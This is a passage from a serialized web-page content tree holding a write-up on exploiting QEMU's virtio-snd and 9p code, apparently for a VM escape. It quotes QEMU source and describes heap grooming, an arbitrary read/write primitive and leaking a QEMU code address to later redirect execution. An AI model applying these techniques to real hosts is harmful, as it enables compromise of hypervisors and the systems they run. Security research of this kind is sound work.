32860}," V9fsFidState ",{"type":26,"tag":137,"props":132862,"children":132863},{"style":5590},[132864],{"type":32,"value":7152},{"type":26,"tag":137,"props":132866,"children":132867},{"style":5682},[132868],{"type":32,"value":132478},{"type":26,"tag":137,"props":132870,"children":132871},{"style":5601},[132872],{"type":32,"value":132873},"(V9fsState ",{"type":26,"tag":137,"props":132875,"children":132876},{"style":5590},[132877],{"type":32,"value":7152},{"type":26,"tag":137,"props":132879,"children":132880},{"style":5584},[132881],{"type":32,"value":13242},{"type":26,"tag":137,"props":132883,"children":132884},{"style":5601},[132885],{"type":32,"value":1108},{"type":26,"tag":137,"props":132887,"children":132888},{"style":5573},[132889],{"type":32,"value":132890},"int32_t",{"type":26,"tag":137,"props":132892,"children":132893},{"style":5584},[132894],{"type":32,"value":132895}," fid",{"type":26,"tag":137,"props":132897,"children":132898},{"style":5601},[132899],{"type":32,"value":5742},{"type":26,"tag":137,"props":132901,"children":132902},{"class":5559,"line":6433},[132903],{"type":26,"tag":137,"props":132904,"children":132905},{"style":5601},[132906],{"type":32,"value":13471},{"type":26,"tag":137,"props":132908,"children":132909},{"class":5559,"line":6441},[132910,132914,132918],{"type":26,"tag":137,"props":132911,"children":132912},{"style":5601},[132913],{"type":32,"value":130642},{"type":26,"tag":137,"props":132915,"children":132916},{"style":5590},[132917],{"type":32,"value":7152},{"type":26,"tag":137,"props":132919,"children":132920},{"style":5601},[132921],{"type":32,"value":53768},{"type":26,"tag":137,"props":132923,"children":132924},{"class":5559,"line":6501},[132925],{"type":26,"tag":137,"props":132926,"children":132927},{"emptyLinePlaceholder":18},[132928],{"type":32,"value":6276},{"type":26,"tag":137,"props":132930,"children":132931},{"class":5559,"line":11634},[132932,132937,132941,132946,132950,132954,132958,132963,132967,132972],{"type":26,"tag":137,"props":132933,"children":132934},{"style":5601},[132935],{"type":32,"value":132936},"    f ",{"type":26,"tag":137,"props":132938,"children":132939},{"style":5590},[132940],{"type":32,"value":289},{"type":26,"tag":137,"props":132942,"children":132943},{"style":5682},[132944],{"type":32,"value":132945}," g_hash_table_lookup",{"type":26,"tag":137,"props":132947,"children":132948},{"style":5601},[132949],{"type":32,"value":165},{"type":26,"tag":137,"props":132951,"children":132952},{"style":5584},[132953],{"type":32,"value":13242},{"type":26,"tag":137,"props":132955,"children":132956},{"style":5601},[132957],{"type":32,"value":16348},{"type":26,"tag":137,"props":132959,"children":132960},{"style":5584},[132961],{"type":32,"value":132962},"fids",{"type":26,"tag":137,"props":132964,"children":132965},{"style":5601},[132966],{"type":32,"value":1108},{"type":26,"tag":137,"props":132968,"children":132969},{"style":5682},[132970],{"type":32,"value":132971},"GINT_TO_POINTER",{"type":26,"tag":137,"props":132973,"children":132974},{"style":5601},[132975],{"type":32,"value":132976},"(fid));\n",{"type":26,"tag":137,"props":132978,"children":132979},{"class":5559,"line":11652},[132980,132984],{"type":26,"tag":137,"props":132981,"children":132982},{"style":5610},[132983],{"type":32,"value":14870},{"type":26,"tag":137,"props":132985,"children":132986},{"style":5601},[132987],{"type":32,"value":132988}," (f) {\n",{"type":26,"tag":137,"props":132990,"children":132991},{"class":5559,"line":11697},[132992],{"type":26,"tag":137,"props":132993,"children":132994},{"style":5564},[132995],{"type":32,"value":132996},"        /* If fid is already there return NULL */\n",{"type":26,"tag":137,"props":132998,"children":132999},{"class":5559,"line":11803},[133000,133005,133009,133013,133017,133022],{"type":26,"tag":137,"props":133001,"children":133002},{"style":5682},[133003],{"type":32,"value":133004},"        BUG_ON",{"type":26,"tag":137,"props":133006,"children":133007},{"style":5601},[133008],{"type":32,"value":165},{"type":26,"tag":137,"props":133010,"children":133011},{"style":5584},[133012],{"type":32,"value":1042},{"type":26,"tag":137,"props":133014,"children":133015},{"style":5601},[133016],{"type":32,"value":16348},{"type":26,"tag":137,"props":133018,"children":133019},{"style":5584},[133020],{"type":32,"value":133021},"clunked",{"type":26,"tag":137,"props":133023,"children":133024},{"style":5601},[133025],{"type":32,"value":6430},{"type":26,"tag":137,"props":133027,"children":133028},{"class":5559,"line":26089},[133029,133033,133037],{"type":26,"tag":137,"props":133030,"children":133031},{"style":5610},[133032],{"type":32,"value":18336},{"type":26,"tag":137,"props":133034,"children":133035},{"style":5573},[133036],{"type":32,"value":130321},{"type":26,"tag":137,"props":133038,"children":133039},{"style":5601},[133040],{"type":32,"value":5604},{"type":26,"tag":137,"props":133042,"children":133043},{"class":5559,"line":26124},[133044],{"type":26,"tag":137,"props":133045,"children":133046},{"style":5601},[133047],{"type":32,"value":5945},{"type":26,"tag":137,"props":133049,"children":133050},{"class":5559,"line":26132},[133051,133055,133059,133064,133069,133073],{"type":26,"tag":137,"props":133052,"children":133053},{"style":5601},[133054],{"type":32,"value":132936},{"type":26,"tag":137,"props":133056,"children":133057},{"style":5590},[133058],{"type":32,"value":289},{"type":26,"tag":137,"props":133060,"children":133061},{"style":5682},[133062],{"type":32,"value":133063}," g_new0",{"type":26,"tag":137,"props":133065,"children":133066},{"style":5601},[133067],{"type":32,"value":133068},"(V9fsFidState, ",{"type":26,"tag":137,"props":133070,"children":133071},{"style":5626},[133072],{"type":32,"value":878},{"type":26,"tag":137,"props":133074,"children":133075},{"style":5601},[133076],{"type":32,"value":6430},{"type":26,"tag":137,"props":133078,"children":133079},{"class":5559,"line":26140},[133080],{"type":26,"tag":137,"props":133081,"children":133082},{"emptyLinePlaceholder":18},[133083],{"type":32,"value":6276},{"type":26,"tag":137,"props":133085,"children":133086},{"class":5559,"line":26149},[133087],{"type":26,"tag":137,"props":133088,"children":133089},{"style":5601},[133090],{"type":32,"value":107381},{"type":26,"tag":35,"props":133092,"children":133093},{},[133094,133096,133101],{"type":32,"value":133095},"After it is allocated, it will be placed into that freed region in place of the old ",{"type":26,"tag":130,"props":133097,"children":133099},{"className":133098},[],[133100],{"type":32,"value":131896},{"type":32,"value":131233},{"type":26,"tag":5512,"props":133103,"children":133105},{"code":133104},"             .value Y extended\n                     |\n+--------------------+--------------------+\n|                                         |\n|                                         |\nv                                         v\n+--------------------+---------------+----+\n|                    |               |....|\n|      .value Y      |  V9fsFidState |....|\n|                    |               |....|\n+--------------------+---------------+----+\n",[133106],{"type":26,"tag":130,"props":133107,"children":133108},{"__ignoreMap":7},[133109],{"type":32,"value":133104},{"type":26,"tag":21485,"props":133111,"children":133113},{"id":133112},"leaking-a-qemu-address",[133114],{"type":32,"value":133115},"Leaking a QEMU Address",{"type":26,"tag":35,"props":133117,"children":133118},{},[133119],{"type":32,"value":133120},"We now have an arbitrary read/write primitive and a controlled chunk at a known address. The next step is to leak a QEMU code address so we can later redirect execution. To do this, we combine the arbitrary read primitive with the known-address chunk: we free that chunk, replace it with an object that contains pointers into QEMU's code or data, and then use arbitrary read to leak its fields.",{"type":26,"tag":35,"props":133122,"children":133123},{},[133124,133126,133131],{"type":32,"value":133125},"For this, we go back to virtio-snd and its buffer allocations. Recall ",{"type":26,"tag":130,"props":133127,"children":133129},{"className":133128},[],[133130],{"type":32,"value":126317},{"type":32,"value":7072},{"type":26,"tag":5512,"props":133133,"children":133135},{"code":133134,"language":4326,"meta":7,"className":19107,"style":7},"static void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)\n{\n    VirtIOSound *vsnd = VIRTIO_SND(vdev);\n    VirtIOSoundPCMBuffer *buffer;\n    VirtQueueElement *elem;\n    size_t msg_sz, size;\n    uint32_t stream_id;\n\n    [...]\n\n    for (;;) {\n        VirtIOSoundPCMStream *stream;\n\n        elem = virtqueue_pop(vq, sizeof(VirtQueueElement));\n        if (!elem) {\n            break;\n        }\n        /* get the message hdr object */\n        msg_sz = iov_to_buf(elem->out_sg,\n                            elem->out_num,\n                            0,\n                            &hdr,\n                            sizeof(virtio_snd_pcm_xfer));\n        if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {\n            goto rx_err;\n        }\n        stream_id = le32_to_cpu(hdr.stream_id);\n\n        [...]\n\n        WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n            size = iov_size(elem->in_sg, elem->in_num) -\n                sizeof(virtio_snd_pcm_status);\n            buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);    // [1]\n            buffer->elem = elem;\n            buffer->vq = vq;                                            // [2]\n            buffer->size = 0;\n            buffer->offset = 0;\n            QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);\n        }\n",[133136],{"type":26,"tag":130,"props":133137,"children":133138},{"__ignoreMap":7},[133139,133182,133189,133220,133235,133250,133262,133275,133282,133289,133296,133307,133322,133329,133357,133376,133387,133394,133402,133439,133460,133472,133485,133498,133524,133536,133543,133581,133588,133595,133602,133633,133688,133700,133741,133764,133793,133820,133847,133879],{"type":26,"tag":137,"props":133140,"children":133141},{"class":5559,"line":5560},[133142,133146,133150,133154,133158,133162,133166,133170,133174,133178],{"type":26,"tag":137,"props":133143,"children":133144},{"style":5573},[133145],{"type":32,"value":53647},{"type":26,"tag":137,"props":133147,"children":133148},{"style":5573},[133149],{"type":32,"value":53652},{"type":26,"tag":137,"props":133151,"children":133152},{"style":5682},[133153],{"type":32,"value":126396},{"type":26,"tag":137,"props":133155,"children":133156},{"style":5601},[133157],{"type":32,"value":126401},{"type":26,"tag":137,"props":133159,"children":133160},{"style":5590},[133161],{"type":32,"value":7152},{"type":26,"tag":137,"props":133163,"children":133164},{"style":5584},[133165],{"type":32,"value":126410},{"type":26,"tag":137,"props":133167,"children":133168},{"style":5601},[133169],{"type":32,"value":126415},{"type":26,"tag":137,"props":133171,"children":133172},{"style":5590},[133173],{"type":32,"value":7152},{"type":26,"tag":137,"props":133175,"children":133176},{"style":5584},[133177],{"type":32,"value":126424},{"type":26,"tag":137,"props":133179,"children":133180},{"style":5601},[133181],{"type":32,"value":5742},{"type":26,"tag":137,"props":133183,"children":133184},{"class":5559,"line":5412},[133185],{"type":26,"tag":137,"props":133186,"children":133187},{"style":5601},[133188],{"type":32,"value":13471},{"type":26,"tag":137,"props":133190,"children":133191},{"class":5559,"line":5417},[133192,133197,133201,133206,133210,133215],{"type":26,"tag":137,"props":133193,"children":133194},{"style":5601},[133195],{"type":32,"value":133196},"    VirtIOSound ",{"type":26,"tag":137,"props":133198,"children":133199},{"style":5590},[133200],{"type":32,"value":7152},{"type":26,"tag":137,"props":133202,"children":133203},{"style":5601},[133204],{"type":32,"value":133205},"vsnd ",{"type":26,"tag":137,"props":133207,"children":133208},{"style":5590},[133209],{"type":32,"value":289},{"type":26,"tag":137,"props":133211,"children":133212},{"style":5682},[133213],{"type":32,"value":133214}," VIRTIO_SND",{"type":26,"tag":137,"props":133216,"children":133217},{"style":5601},[133218],{"type":32,"value":133219},"(vdev);\n",{"type":26,"tag":137,"props":133221,"children":133222},{"class":5559,"line":5642},[133223,133227,133231],{"type":26,"tag":137,"props":133224,"children":133225},{"style":5601},[133226],{"type":32,"value":127413},{"type":26,"tag":137,"props":133228,"children":133229},{"style":5590},[133230],{"type":32,"value":7152},{"type":26,"tag":137,"props":133232,"children":133233},{"style":5601},[133234],{"type":32,"value":127422},{"type":26,"tag":137,"props":133236,"children":133237},{"class":5559,"line":5745},[133238,133242,133246],{"type":26,"tag":137,"props":133239,"children":133240},{"style":5601},[133241],{"type":32,"value":126443},{"type":26,"tag":137,"props":133243,"children":133244},{"style":5590},[133245],{"type":32,"value":7152},{"type":26,"tag":137,"props":133247,"children":133248},{"style":5601},[133249],{"type":32,"value":126452},{"type":26,"tag":137,"props":133251,"children":133252},{"class":5559,"line":5850},[133253,133257],{"type":26,"tag":137,"props":133254,"children":133255},{"style":5573},[133256],{"type":32,"value":19157},{"type":26,"tag":137,"props":133258,"children":133259},{"style":5601},[133260],{"type":32,"value":133261}," msg_sz, size;\n",{"type":26,"tag":137,"props":133263,"children":133264},{"class":5559,"line":5878},[133265,133270],{"type":26,"tag":137,"props":133266,"children":133267},{"style":5573},[133268],{"type":32,"value":133269},"    uint32_t",{"type":26,"tag":137,"props":133271,"children":133272},{"style":5601},[133273],{"type":32,"value":133274}," stream_id;\n",{"type":26,"tag":137,"props":133276,"children":133277},{"class":5559,"line":5891},[133278],{"type":26,"tag":137,"props":133279,"children":133280},{"emptyLinePlaceholder":18},[133281],{"type":32,"value":6276},{"type":26,"tag":137,"props":133283,"children":133284},{"class":5559,"line":5909},[133285],{"type":26,"tag":137,"props":133286,"children":133287},{"style":5601},[133288],{"type":32,"value":107381},{"type":26,"tag":137,"props":133290,"children":133291},{"class":5559,"line":5930},[133292],{"type":26,"tag":137,"props":133293,"children":133294},{"emptyLinePlaceholder":18},[133295],{"type":32,"value":6276},{"type":26,"tag":137,"props":133297,"children":133298},{"class":5559,"line":5939},[133299,133303],{"type":26,"tag":137,"props":133300,"children":133301},{"style":5610},[133302],{"type":32,"value":5613},{"type":26,"tag":137,"props":133304,"children":133305},{"style":5601},[133306],{"type":32,"value":126478},{"type":26,"tag":137,"props":133308,"children":133309},{"class":5559,"line":6191},[133310,133314,133318],{"type":26,"tag":137,"props":133311,"children":133312},{"style":5601},[133313],{"type":32,"value":126486},{"type":26,"tag":137,"props":133315,"children":133316},{"style":5590},[133317],{"type":32,"value":7152},{"type":26,"tag":137,"props":133319,"children":133320},{"style":5601},[133321],{"type":32,"value":126495},{"type":26,"tag":137,"props":133323,"children":133324},{"class":5559,"line":6208},[133325],{"type":26,"tag":137,"props":133326,"children":133327},{"emptyLinePlaceholder":18},[133328],{"type":32,"value":6276},{"type":26,"tag":137,"props":133330,"children":133331},{"class":5559,"line":6225},[133332,133336,133340,133344,133348,133352],{"type":26,"tag":137,"props":133333,"children":133334},{"style":5601},[133335],{"type":32,"value":126510},{"type":26,"tag":137,"props":133337,"children":133338},{"style":5590},[133339],{"type":32,"value":289},{"type":26,"tag":137,"props":133341,"children":133342},{"style":5682},[133343],{"type":32,"value":126519},{"type":26,"tag":137,"props":133345,"children":133346},{"style":5601},[133347],{"type":32,"value":126524},{"type":26,"tag":137,"props":133349,"children":133350},{"style":5573},[133351],{"type":32,"value":57930},{"type":26,"tag":137,"props":133353,"children":133354},{"style":5601},[133355],{"type":32,"value":133356},"(VirtQueueElement));\n",{"type":26,"tag":137,"props":133358,"children":133359},{"class":5559,"line":6238},[133360,133364,133368,133372],{"type":26,"tag":137,"props":133361,"children":133362},{"style":5610},[133363],{"type":32,"value":5856},{"type":26,"tag":137,"props":133365,"children":133366},{"style":5601},[133367],{"type":32,"value":4625},{"type":26,"tag":137,"props":133369,"children":133370},{"style":5590},[133371],{"type":32,"value":23215},{"type":26,"tag":137,"props":133373,"children":133374},{"style":5601},[133375],{"type":32,"value":126558},{"type":26,"tag":137,"props":133377,"children":133378},{"class":5559,"line":6247},[133379,133383],{"type":26,"tag":137,"props":133380,"children":133381},{"style":5610},[133382],{"type":32,"value":5884},{"type":26,"tag":137,"props":133384,"children":133385},{"style":5601},[133386],{"type":32,"value":5604},{"type":26,"tag":137,"props":133388,"children":133389},{"class":5559,"line":6270},[133390],{"type":26,"tag":137,"props":133391,"children":133392},{"style":5601},[133393],{"type":32,"value":5936},{"type":26,"tag":137,"props":133395,"children":133396},{"class":5559,"line":6279},[133397],{"type":26,"tag":137,"props":133398,"children":133399},{"style":5564},[133400],{"type":32,"value":133401},"        /* get the message hdr object */\n",{"type":26,"tag":137,"props":133403,"children":133404},{"class":5559,"line":6288},[133405,133410,133414,133419,133423,133427,133431,133435],{"type":26,"tag":137,"props":133406,"children":133407},{"style":5601},[133408],{"type":32,"value":133409},"        msg_sz ",{"type":26,"tag":137,"props":133411,"children":133412},{"style":5590},[133413],{"type":32,"value":289},{"type":26,"tag":137,"props":133415,"children":133416},{"style":5682},[133417],{"type":32,"value":133418}," iov_to_buf",{"type":26,"tag":137,"props":133420,"children":133421},{"style":5601},[133422],{"type":32,"value":165},{"type":26,"tag":137,"props":133424,"children":133425},{"style":5584},[133426],{"type":32,"value":54667},{"type":26,"tag":137,"props":133428,"children":133429},{"style":5601},[133430],{"type":32,"value":16348},{"type":26,"tag":137,"props":133432,"children":133433},{"style":5584},[133434],{"type":32,"value":126961},{"type":26,"tag":137,"props":133436,"children":133437},{"style":5601},[133438],{"type":32,"value":6099},{"type":26,"tag":137,"props":133440,"children":133441},{"class":5559,"line":6355},[133442,133447,133451,133456],{"type":26,"tag":137,"props":133443,"children":133444},{"style":5584},[133445],{"type":32,"value":133446},"                            elem",{"type":26,"tag":137,"props":133448,"children":133449},{"style":5601},[133450],{"type":32,"value":16348},{"type":26,"tag":137,"props":133452,"children":133453},{"style":5584},[133454],{"type":32,"value":133455},"out_num",{"type":26,"tag":137,"props":133457,"children":133458},{"style":5601},[133459],{"type":32,"value":6099},{"type":26,"tag":137,"props":133461,"children":133462},{"class":5559,"line":6363},[133463,133468],{"type":26,"tag":137,"props":133464,"children":133465},{"style":5626},[133466],{"type":32,"value":133467},"                            0",{"type":26,"tag":137,"props":133469,"children":133470},{"style":5601},[133471],{"type":32,"value":6099},{"type":26,"tag":137,"props":133473,"children":133474},{"class":5559,"line":6393},[133475,133480],{"type":26,"tag":137,"props":133476,"children":133477},{"style":5590},[133478],{"type":32,"value":133479},"                            &",{"type":26,"tag":137,"props":133481,"children":133482},{"style":5601},[133483],{"type":32,"value":133484},"hdr,\n",{"type":26,"tag":137,"props":133486,"children":133487},{"class":5559,"line":6401},[133488,133493],{"type":26,"tag":137,"props":133489,"children":133490},{"style":5573},[133491],{"type":32,"value":133492},"                            sizeof",{"type":26,"tag":137,"props":133494,"children":133495},{"style":5601},[133496],{"type":32,"value":133497},"(virtio_snd_pcm_xfer));\n",{"type":26,"tag":137,"props":133499,"children":133500},{"class":5559,"line":6433},[133501,133505,133510,133514,133519],{"type":26,"tag":137,"props":133502,"children":133503},{"style":5610},[133504],{"type":32,"value":5856},{"type":26,"tag":137,"props":133506,"children":133507},{"style":5601},[133508],{"type":32,"value":133509}," (msg_sz ",{"type":26,"tag":137,"props":133511,"children":133512},{"style":5590},[133513],{"type":32,"value":18280},{"type":26,"tag":137,"props":133515,"children":133516},{"style":5573},[133517],{"type":32,"value":133518}," sizeof",{"type":26,"tag":137,"props":133520,"children":133521},{"style":5601},[133522],{"type":32,"value":133523},"(virtio_snd_pcm_xfer)) {\n",{"type":26,"tag":137,"props":133525,"children":133526},{"class":5559,"line":6441},[133527,133531],{"type":26,"tag":137,"props":133528,"children":133529},{"style":5610},[133530],{"type":32,"value":63151},{"type":26,"tag":137,"props":133532,"children":133533},{"style":5601},[133534],{"type":32,"value":133535}," rx_err;\n",{"type":26,"tag":137,"props":133537,"children":133538},{"class":5559,"line":6501},[133539],{"type":26,"tag":137,"props":133540,"children":133541},{"style":5601},[133542],{"type":32,"value":5936},{"type":26,"tag":137,"props":133544,"children":133545},{"class":5559,"line":11634},[133546,133551,133555,133559,133563,133568,133572,133577],{"type":26,"tag":137,"props":133547,"children":133548},{"style":5601},[133549],{"type":32,"value":133550},"        stream_id ",{"type":26,"tag":137,"props":133552,"children":133553},{"style":5590},[133554],{"type":32,"value":289},{"type":26,"tag":137,"props":133556,"children":133557},{"style":5682},[133558],{"type":32,"value":128423},{"type":26,"tag":137,"props":133560,"children":133561},{"style":5601},[133562],{"type":32,"value":165},{"type":26,"tag":137,"props":133564,"children":133565},{"style":5584},[133566],{"type":32,"value":133567},"hdr",{"type":26,"tag":137,"props":133569,"children":133570},{"style":5601},[133571],{"type":32,"value":470},{"type":26,"tag":137,"props":133573,"children":133574},{"style":5584},[133575],{"type":32,"value":133576},"stream_id",{"type":26,"tag":137,"props":133578,"children":133579},{"style":5601},[133580],{"type":32,"value":6430},{"type":26,"tag":137,"props":133582,"children":133583},{"class":5559,"line":11652},[133584],{"type":26,"tag":137,"props":133585,"children":133586},{"emptyLinePlaceholder":18},[133587],{"type":32,"value":6276},{"type":26,"tag":137,"props":133589,"children":133590},{"class":5559,"line":11697},[133591],{"type":26,"tag":137,"props":133592,"children":133593},{"style":5601},[133594],{"type":32,"value":126591},{"type":26,"tag":137,"props":133596,"children":133597},{"class":5559,"line":11803},[133598],{"type":26,"tag":137,"props":133599,"children":133600},{"emptyLinePlaceholder":18},[133601],{"type":32,"value":6276},{"type":26,"tag":137,"props":133603,"children":133604},{"class":5559,"line":26089},[133605,133609,133613,133617,133621,133625,133629],{"type":26,"tag":137,"props":133606,"children":133607},{"style":5682},[133608],{"type":32,"value":126606},{"type":26,"tag":137,"props":133610,"children":133611},{"style":5601},[133612],{"type":32,"value":165},{"type":26,"tag":137,"props":133614,"children":133615},{"style":5590},[133616],{"type":32,"value":5694},{"type":26,"tag":137,"props":133618,"children":133619},{"style":5584},[133620],{"type":32,"value":38857},{"type":26,"tag":137,"props":133622,"children":133623},{"style":5601},[133624],{"type":32,"value":16348},{"type":26,"tag":137,"props":133626,"children":133627},{"style":5584},[133628],{"type":32,"value":126627},{"type":26,"tag":137,"props":133630,"children":133631},{"style":5601},[133632],{"type":32,"value":17395},{"type":26,"tag":137,"props":133634,"children":133635},{"class":5559,"line":26124},[133636,133640,133644,133648,133652,133656,133660,133664,133668,133672,133676,133680,133684],{"type":26,"tag":137,"props":133637,"children":133638},{"style":5601},[133639],{"type":32,"value":126639},{"type":26,"tag":137,"props":133641,"children":133642},{"style":5590},[133643],{"type":32,"value":289},{"type":26,"tag":137,"props":133645,"children":133646},{"style":5682},[133647],{"type":32,"value":126648},{"type":26,"tag":137,"props":133649,"children":133650},{"style":5601},[133651],{"type":32,"value":165},{"type":26,"tag":137,"props":133653,"children":133654},{"style":5584},[133655],{"type":32,"value":54667},{"type":26,"tag":137,"props":133657,"children":133658},{"style":5601},[133659],{"type":32,"value":16348},{"type":26,"tag":137,"props":133661,"children":133662},{"style":5584},[133663],{"type":32,"value":126665},{"type":26,"tag":137,"props":133665,"children":133666},{"style":5601},[133667],{"type":32,"value":1108},{"type":26,"tag":137,"props":133669,"children":133670},{"style":5584},[133671],{"type":32,"value":54667},{"type":26,"tag":137,"props":133673,"children":133674},{"style":5601},[133675],{"type":32,"value":16348},{"type":26,"tag":137,"props":133677,"children":133678},{"style":5584},[133679],{"type":32,"value":126682},{"type":26,"tag":137,"props":133681,"children":133682},{"style":5601},[133683],{"type":32,"value":5671},{"type":26,"tag":137,"props":133685,"children":133686},{"style":5590},[133687],{"type":32,"value":53464},{"type":26,"tag":137,"props":133689,"children":133690},{"class":5559,"line":26132},[133691,133695],{"type":26,"tag":137,"props":133692,"children":133693},{"style":5573},[133694],{"type":32,"value":126698},{"type":26,"tag":137,"props":133696,"children":133697},{"style":5601},[133698],{"type":32,"value":133699},"(virtio_snd_pcm_status);\n",{"type":26,"tag":137,"props":133701,"children":133702},{"class":5559,"line":26140},[133703,133707,133711,133715,133719,133723,133727,133731,133736],{"type":26,"tag":137,"props":133704,"children":133705},{"style":5601},[133706],{"type":32,"value":126716},{"type":26,"tag":137,"props":133708,"children":133709},{"style":5590},[133710],{"type":32,"value":289},{"type":26,"tag":137,"props":133712,"children":133713},{"style":5682},[133714],{"type":32,"value":126725},{"type":26,"tag":137,"props":133716,"children":133717},{"style":5601},[133718],{"type":32,"value":165},{"type":26,"tag":137,"props":133720,"children":133721},{"style":5573},[133722],{"type":32,"value":57930},{"type":26,"tag":137,"props":133724,"children":133725},{"style":5601},[133726],{"type":32,"value":126738},{"type":26,"tag":137,"props":133728,"children":133729},{"style":5590},[133730],{"type":32,"value":356},{"type":26,"tag":137,"props":133732,"children":133733},{"style":5601},[133734],{"type":32,"value":133735}," size);",{"type":26,"tag":137,"props":133737,"children":133738},{"style":5564},[133739],{"type":32,"value":133740},"    // [1]\n",{"type":26,"tag":137,"props":133742,"children":133743},{"class":5559,"line":26149},[133744,133748,133752,133756,133760],{"type":26,"tag":137,"props":133745,"children":133746},{"style":5584},[133747],{"type":32,"value":126755},{"type":26,"tag":137,"props":133749,"children":133750},{"style":5601},[133751],{"type":32,"value":16348},{"type":26,"tag":137,"props":133753,"children":133754},{"style":5584},[133755],{"type":32,"value":54667},{"type":26,"tag":137,"props":133757,"children":133758},{"style":5590},[133759],{"type":32,"value":5593},{"type":26,"tag":137,"props":133761,"children":133762},{"style":5601},[133763],{"type":32,"value":126772},{"type":26,"tag":137,"props":133765,"children":133766},{"class":5559,"line":26191},[133767,133771,133775,133779,133783,133788],{"type":26,"tag":137,"props":133768,"children":133769},{"style":5584},[133770],{"type":32,"value":126755},{"type":26,"tag":137,"props":133772,"children":133773},{"style":5601},[133774],{"type":32,"value":16348},{"type":26,"tag":137,"props":133776,"children":133777},{"style":5584},[133778],{"type":32,"value":126424},{"type":26,"tag":137,"props":133780,"children":133781},{"style":5590},[133782],{"type":32,"value":5593},{"type":26,"tag":137,"props":133784,"children":133785},{"style":5601},[133786],{"type":32,"value":133787}," vq;",{"type":26,"tag":137,"props":133789,"children":133790},{"style":5564},[133791],{"type":32,"value":133792},"                                            // [2]\n",{"type":26,"tag":137,"props":133794,"children":133795},{"class":5559,"line":26224},[133796,133800,133804,133808,133812,133816],{"type":26,"tag":137,"props":133797,"children":133798},{"style":5584},[133799],{"type":32,"value":126755},{"type":26,"tag":137,"props":133801,"children":133802},{"style":5601},[133803],{"type":32,"value":16348},{"type":26,"tag":137,"props":133805,"children":133806},{"style":5584},[133807],{"type":32,"value":126812},{"type":26,"tag":137,"props":133809,"children":133810},{"style":5590},[133811],{"type":32,"value":5593},{"type":26,"tag":137,"props":133813,"children":133814},{"style":5626},[133815],{"type":32,"value":5629},{"type":26,"tag":137,"props":133817,"children":133818},{"style":5601},[133819],{"type":32,"value":5604},{"type":26,"tag":137,"props":133821,"children":133822},{"class":5559,"line":26232},[133823,133827,133831,133835,133839,133843],{"type":26,"tag":137,"props":133824,"children":133825},{"style":5584},[133826],{"type":32,"value":126755},{"type":26,"tag":137,"props":133828,"children":133829},{"style":5601},[133830],{"type":32,"value":16348},{"type":26,"tag":137,"props":133832,"children":133833},{"style":5584},[133834],{"type":32,"value":16492},{"type":26,"tag":137,"props":133836,"children":133837},{"style":5590},[133838],{"type":32,"value":5593},{"type":26,"tag":137,"props":133840,"children":133841},{"style":5626},[133842],{"type":32,"value":5629},{"type":26,"tag":137,"props":133844,"children":133845},{"style":5601},[133846],{"type":32,"value":5604},{"type":26,"tag":137,"props":133848,"children":133849},{"class":5559,"line":26240},[133850,133854,133858,133862,133866,133870,133874],{"type":26,"tag":137,"props":133851,"children":133852},{"style":5682},[133853],{"type":32,"value":126859},{"type":26,"tag":137,"props":133855,"children":133856},{"style":5601},[133857],{"type":32,"value":165},{"type":26,"tag":137,"props":133859,"children":133860},{"style":5590},[133861],{"type":32,"value":5694},{"type":26,"tag":137,"props":133863,"children":133864},{"style":5584},[133865],{"type":32,"value":38857},{"type":26,"tag":137,"props":133867,"children":133868},{"style":5601},[133869],{"type":32,"value":16348},{"type":26,"tag":137,"props":133871,"children":133872},{"style":5584},[133873],{"type":32,"value":126880},{"type":26,"tag":137,"props":133875,"children":133876},{"style":5601},[133877],{"type":32,"value":133878},", buffer, entry);\n",{"type":26,"tag":137,"props":133880,"children":133881},{"class":5559,"line":26249},[133882],{"type":26,"tag":137,"props":133883,"children":133884},{"style":5601},[133885],{"type":32,"value":5936},{"type":26,"tag":35,"props":133887,"children":133888},{},[133889,133890,133895,133897,133902,133904,133909,133911,133917],{"type":32,"value":126934},{"type":26,"tag":130,"props":133891,"children":133893},{"className":133892},[],[133894],{"type":32,"value":126940},{"type":32,"value":133896},", QEMU allocates a ",{"type":26,"tag":130,"props":133898,"children":133900},{"className":133899},[],[133901],{"type":32,"value":127076},{"type":32,"value":133903}," whose size depends on the guest-provided iovec, and at ",{"type":26,"tag":130,"props":133905,"children":133907},{"className":133906},[],[133908],{"type":32,"value":126974},{"type":32,"value":133910}," it stores the ",{"type":26,"tag":130,"props":133912,"children":133914},{"className":133913},[],[133915],{"type":32,"value":133916},"VirtQueue *vq",{"type":32,"value":133918}," pointer into the buffer.",{"type":26,"tag":35,"props":133920,"children":133921},{},[133922,133923,133929],{"type":32,"value":66817},{"type":26,"tag":130,"props":133924,"children":133926},{"className":133925},[],[133927],{"type":32,"value":133928},"VirtQueue",{"type":32,"value":133930}," structure contains some useful fields:",{"type":26,"tag":5512,"props":133932,"children":133934},{"code":133933,"language":4326,"meta":7,"className":19107,"style":7},"struct VirtQueue\n{\n    [...]\n\n    VirtIOHandleOutput handle_output;\n    VirtIODevice *vdev;\n\n    [...]\n};\n",[133935],{"type":26,"tag":130,"props":133936,"children":133937},{"__ignoreMap":7},[133938,133950,133957,133964,133971,133979,133996,134003,134010],{"type":26,"tag":137,"props":133939,"children":133940},{"class":5559,"line":5560},[133941,133945],{"type":26,"tag":137,"props":133942,"children":133943},{"style":5573},[133944],{"type":32,"value":11990},{"type":26,"tag":137,"props":133946,"children":133947},{"style":5601},[133948],{"type":32,"value":133949}," VirtQueue\n",{"type":26,"tag":137,"props":133951,"children":133952},{"class":5559,"line":5412},[133953],{"type":26,"tag":137,"props":133954,"children":133955},{"style":5601},[133956],{"type":32,"value":13471},{"type":26,"tag":137,"props":133958,"children":133959},{"class":5559,"line":5417},[133960],{"type":26,"tag":137,"props":133961,"children":133962},{"style":5601},[133963],{"type":32,"value":107381},{"type":26,"tag":137,"props":133965,"children":133966},{"class":5559,"line":5642},[133967],{"type":26,"tag":137,"props":133968,"children":133969},{"emptyLinePlaceholder":18},[133970],{"type":32,"value":6276},{"type":26,"tag":137,"props":133972,"children":133973},{"class":5559,"line":5745},[133974],{"type":26,"tag":137,"props":133975,"children":133976},{"style":5601},[133977],{"type":32,"value":133978},"    VirtIOHandleOutput handle_output;\n",{"type":26,"tag":137,"props":133980,"children":133981},{"class":5559,"line":5850},[133982,133987,133991],{"type":26,"tag":137,"props":133983,"children":133984},{"style":5601},[133985],{"type":32,"value":133986},"  